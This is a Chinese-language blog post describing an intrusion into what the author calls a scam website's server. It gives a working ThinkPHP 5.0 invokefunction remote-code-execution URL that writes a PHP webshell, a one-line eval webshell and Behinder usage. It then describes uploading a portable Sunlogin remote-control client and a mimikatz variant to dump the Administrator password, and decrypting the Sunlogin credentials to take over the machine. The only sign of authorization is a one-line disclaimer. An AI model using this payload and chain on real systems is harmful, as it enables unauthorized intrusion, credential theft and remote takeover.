<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="0x00 前言 任何渗透测试技术支持服务，都应该先拿到授权书后方可进行。  0x01 信息收集http:&#x2F;&#x2F;www.xxxx.cn&#x2F;login 1234567FrontFrame: Twitter Bootstrap,jQuery Sparklines,OWL Carousel,Font Awesome,JQuery:1.8.3,HTML5Widget: Access-ControlLangu">
<meta property="og:type" content="article">
<meta property="og:title" content="渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器">
<meta property="og:url" content="https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/index.html">
<meta property="og:site_name" content="Lee&#39;s Blog">
<meta property="og:description" content="0x00 前言 任何渗透测试技术支持服务，都应该先拿到授权书后方可进行。  0x01 信息收集http:&#x2F;&#x2F;www.xxxx.cn&#x2F;login 1234567FrontFrame: Twitter Bootstrap,jQuery Sparklines,OWL Carousel,Font Awesome,JQuery:1.8.3,HTML5Widget: Access-ControlLangu">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816150536227-1656712009.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816150638444-2002532457.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816150805152-942618794.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816150815077-2116059478.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816150917663-596583674.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151116360-810544006.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151139779-938529109.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151221583-1867892045.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151235114-111641459.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151245322-1478852002.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151341165-695812818.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151357371-102688335.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151421989-42248780.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151431381-744914.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151447218-1031169864.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151507031-444365686.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151557977-3317338.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151609868-742170837.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151620028-226874935.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151636040-1318970692.png">
<meta property="og:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151650462-1434249605.png">
<meta property="article:published_time" content="2021-06-02T11:21:00.000Z">
<meta property="article:modified_time" content="2021-08-16T07:59:32.000Z">
<meta property="article:author" content="VxerLee">
<meta property="article:tag" content="ThinkPHP漏洞">
<meta property="article:tag" content="内网渗透">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816150536227-1656712009.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="Lee's Blog" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/probberechts">项目</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2021/08/05/IoTSecurity/IoT-vulhub/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2020/11/13/Forensics/mimikatz/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/&text=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/&title=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/&is_video=false&description=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器&body=Check out this article: https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/&title=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/&title=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/&title=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/&title=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/&name=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/&t=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">0x00 前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">2.</span> <span class="toc-text">0x01 信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95"><span class="toc-number">3.</span> <span class="toc-text">0x02 漏洞测试</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E4%B8%80%E5%8F%A5%E8%AF%9DShell"><span class="toc-number">4.</span> <span class="toc-text">0x03 一句话Shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-%E5%86%B0%E8%9D%8E-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F"><span class="toc-number">5.</span> <span class="toc-text">0x04 冰蝎 内网渗透</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-%E5%90%91%E6%97%A5%E8%91%B5%E8%BF%9C%E6%8E%A7%E7%BB%84%E5%90%88%E6%8B%B3"><span class="toc-number">6.</span> <span class="toc-text">0x05 向日葵远控组合拳</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x06-%E5%88%A9%E7%94%A8%E6%88%90%E5%8A%9F"><span class="toc-number">7.</span> <span class="toc-text">0x06 利用成功</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">VxerLee</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-06-02T11:21:00.000Z" itemprop="datePublished">2021-06-02</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/Web%E5%AE%89%E5%85%A8/">Web安全</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/ThinkPHP%E6%BC%8F%E6%B4%9E/" rel="tag">ThinkPHP漏洞</a>, <a class="tag-link-link" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" rel="tag">内网渗透</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <meta name="referrer" content="no-referrer"/>

<h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><blockquote>
<p>任何渗透测试技术支持服务，都应该先拿到授权书后方可进行。</p>
</blockquote>
<h2 id="0x01-信息收集"><a href="#0x01-信息收集" class="headerlink" title="0x01 信息收集"></a>0x01 信息收集</h2><p><a target="_blank" rel="noopener" href="http://www.xxxx.cn/login">http://www.xxxx.cn/login</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">FrontFrame: Twitter Bootstrap,jQuery Sparklines,OWL Carousel,Font Awesome,JQuery:1.8.3,HTML5</span><br><span class="line">Widget: Access-Control</span><br><span class="line">Language: PHP&#x2F;7.1.13,PHP:7.1.13  (PHP框架)</span><br><span class="line">WebService: Nginx</span><br><span class="line">Other: Author:Mosaddek,Embed JSON</span><br><span class="line">xxx.xxx.xxx.xxx [香港 ThinkDream数据中心]</span><br><span class="line">域名注册商	阿里巴巴云计算（北京）有限公司</span><br></pre></td></tr></table></figure>
<p>没识别到相关的CMS组件信息，我们进行手动操作，随便输入点什么让服务器报错回显有关信息。<br>比如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;www.xxx.cn&#x2F;apip.php</span><br><span class="line">回显：</span><br><span class="line">熟悉的面孔，thinkphp</span><br><span class="line">ThinkPHP V5.0.22 &#123; 十年磨一剑-为API开发设计的高性能框架 &#125; （ThinkPHP 5.0.22）</span><br><span class="line">THINK_PATH D:\phpStudy\PHPTutorial\WWW\xxx\thinkphp\ （Windows 服务器，phpStudy）</span><br><span class="line">Apache&#x2F;2.4.23 (Win32) OpenSSL&#x2F;1.0.2j mod_fcgid&#x2F;2.3.9 （Apache）</span><br></pre></td></tr></table></figure>

<p><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816150536227-1656712009.png" alt="1"> </p>
<h2 id="0x02-漏洞测试"><a href="#0x02-漏洞测试" class="headerlink" title="0x02 漏洞测试"></a>0x02 漏洞测试</h2><p>知道了对方用的CMS和框架后，可以尝试用漏洞测试工具对其进行测试。<br>ThinkPHP漏洞取证小助手一顿撸!<br><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816150638444-2002532457.png" alt="image-20210816150638045"><br>哦吼，返回404？？？？这是怎么回事呢？ 让我看看。<br><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816150805152-942618794.png" alt="image-20210530145844566"><br>返回404说明主站的路径默认不在根目录，通过测试发现在public目录。<br><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816150815077-2116059478.png" alt="image-20210530150052092"><br>我去访问WebShell的时候，返回了奇怪的错误提示模块不存在public，我想这应该是我的Shell1.php写到了后端根目录，即<code>phpStudy\www\xxx\shell1.php</code>，而网站管理员设置了只能访问前端目录即<code>nginx\html\dist-xx\index.html</code>，所以访问时候就会报错显示404 无法访问。<br><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816150917663-596583674.png" alt="image-20210816150917217"><br>（实验了下，确实前后端目录分离，在前端img目录下写入404.txt可正常访问到。）<br><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151116360-810544006.png" alt="image-20210531180824901"><br><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151139779-938529109.png" alt="image-20210531180846255"><br>解决方案：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#管理员配置了我们只能访问public目录，那我们就用绝对路径的方式找到public目录，并且写入一句话。</span><br><span class="line">#由ThinkPHP报错得知，public绝对路径如下</span><br><span class="line">PUBLIC_PATH  D:\phpStudy\PHPTutorial\WWW\xx\public\</span><br></pre></td></tr></table></figure>
<p><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151221583-1867892045.png" alt="image-20210530152452017"><br><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151235114-111641459.png" alt="image-20210530152606303"><br><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151245322-1478852002.png" alt="image-20210530152647511"><br>写入phpinfo</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;www.xxx.com&#x2F;public&#x2F;index.php?s&#x3D;&#x2F;index&#x2F;think\app&#x2F;invokefunction&amp;function&#x3D;call_user_func_array&amp;vars[0]&#x3D;file_put_contents&amp;vars[1][]&#x3D;shell1.php&amp;vars[1][]&#x3D;&lt;?phpinfo();?&gt;</span><br></pre></td></tr></table></figure>
<p>写入一句话</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">eval</span>(xxxxxxxxx); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<h2 id="0x03-一句话Shell"><a href="#0x03-一句话Shell" class="headerlink" title="0x03 一句话Shell"></a>0x03 一句话Shell</h2><p><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151341165-695812818.png" alt="image-20210530152920940"> </p>
<h2 id="0x04-冰蝎-内网渗透"><a href="#0x04-冰蝎-内网渗透" class="headerlink" title="0x04 冰蝎 内网渗透"></a>0x04 冰蝎 内网渗透</h2><p>冰蝎下载地址：<a target="_blank" rel="noopener" href="https://github.com/rebeyond/Behinder/releases/download/Behinder_v3.0_Beta_11/Behinder_v3.0_Beta_11.t00ls.zip">https://github.com/rebeyond/Behinder/releases/download/Behinder_v3.0_Beta_11/Behinder_v3.0_Beta_11.t00ls.zip</a><br>冰蝎 一句话Shell</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">@error_reporting(<span class="number">0</span>);</span><br><span class="line">......</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>运行冰蝎</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar Behinder.jar</span><br></pre></td></tr></table></figure>
<p><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151357371-102688335.png" alt="image-20210530154310972"><br>服务器信息收集：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#用来查看开了哪些进程，一般判断有哪些防火墙、杀毒软件</span></span><br><span class="line">tasklist /SVC</span><br></pre></td></tr></table></figure>
<p>将结果复制到这个网站中进行过滤<a target="_blank" rel="noopener" href="https://maikefee.com/av_list">https://maikefee.com/av_list</a></p>
<h2 id="0x05-向日葵远控组合拳"><a href="#0x05-向日葵远控组合拳" class="headerlink" title="0x05 向日葵远控组合拳"></a>0x05 向日葵远控组合拳</h2><p>工具目录：</p>
<ul>
<li>sun.exe 向日葵</li>
<li>ggg.exe 绕过向日葵安装</li>
<li>new_mimi.exe 读取服务器密码</li>
<li>de_sun.exe 向日葵密码解密工具 (这个可以不用上传到远程服务器)</li>
</ul>
<p><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151421989-42248780.png" alt="image-20210530165312741"> </p>
<p>将文件上传到 <code>C:/xxx/xxx/</code>目录<br>然后分别运行如下命令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">C:/xxx/xxx/&gt; ggg.exe  <span class="comment">#让向日葵以绿色模式运行，无须安装</span></span><br><span class="line">C:/xxx/xxx/&gt; sun.exe  <span class="comment">#运行向日葵</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>重要！！！</p>
<p>向注册表中写入向日葵安装信息成功，运行向日葵后无须安装。</p>
</blockquote>
<p><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151431381-744914.png" alt="image-20210530165806676"> </p>
<blockquote>
<p>运行sun.exe 向日葵后，会在C:\ProgramData目录多出一个Oray目录（向日葵配置信息）。</p>
<p>下载向日葵配置文件C:/ProgramData/Oray/SunloginClient/config.ini<br><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151447218-1031169864.png" alt="image-20210530170038380"><br>解析向日葵配置文件，提取验证码和密码</p>
<p>验证码：xxxxx</p>
<p>密码（加密）：gxfhaBnFFlQ=<br><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151507031-444365686.png" alt="image-20210530170228194"><br>在本机运行de_sun.exe，解密向日葵密码<br><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151557977-3317338.png" alt="image-20210530170417329"><br>向日葵</p>
<p>伙伴识别码：xxxxx</p>
<p>验证码：Tlm3S0</p>
</blockquote>
<p><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151609868-742170837.png" alt="image-20210530170552978"><br>成功连接上了远程服务器的向日葵，但是需要账号密码解锁！<br>上传组合拳里面的 new_mimi.exe 到远程服务器，运行如下命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:/xxx/xxx/ &gt;new_mimi.exe</span><br></pre></td></tr></table></figure>
<p><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151620028-226874935.png" alt="image-20210530170737867"><br>提取出账号密码</p>
<blockquote>
<p>远程服务器账号密码信息</p>
<p>Username : Administrator<br>Domain   :<br>Password : 12345678911</p>
</blockquote>
<h2 id="0x06-利用成功"><a href="#0x06-利用成功" class="headerlink" title="0x06 利用成功"></a>0x06 利用成功</h2><p><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151636040-1318970692.png" alt="image-20210530170923013"><br><img src="https://img2020.cnblogs.com/blog/2080041/202108/2080041-20210816151650462-1434249605.png" alt="image-20210530171012224"><br>：)可以看到管理员在偷偷看注册的用户信息，我确认了服务器管理员不在操作，于是进行了进一步取证，得到了管理员的真实ip地址，上面还有一个百度网盘，里面有管理员的账号信息，接下来就是将信息交给警察叔叔处理吧。</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a target="_blank" rel="noopener" href="http://github.com/probberechts">项目</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">0x00 前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">2.</span> <span class="toc-text">0x01 信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95"><span class="toc-number">3.</span> <span class="toc-text">0x02 漏洞测试</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E4%B8%80%E5%8F%A5%E8%AF%9DShell"><span class="toc-number">4.</span> <span class="toc-text">0x03 一句话Shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-%E5%86%B0%E8%9D%8E-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F"><span class="toc-number">5.</span> <span class="toc-text">0x04 冰蝎 内网渗透</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-%E5%90%91%E6%97%A5%E8%91%B5%E8%BF%9C%E6%8E%A7%E7%BB%84%E5%90%88%E6%8B%B3"><span class="toc-number">6.</span> <span class="toc-text">0x05 向日葵远控组合拳</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x06-%E5%88%A9%E7%94%A8%E6%88%90%E5%8A%9F"><span class="toc-number">7.</span> <span class="toc-text">0x06 利用成功</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/&text=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/&title=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/&is_video=false&description=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器&body=Check out this article: https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/&title=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/&title=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/&title=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/&title=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/&name=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://vxer-lee.github.io/2021/06/02/WebSecurity/ThinkPHPAndSunHack/&t=渗透之从ThinkPHP漏洞到向日葵远控拿下诈骗服务器"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2023
    VxerLee
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/probberechts">项目</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
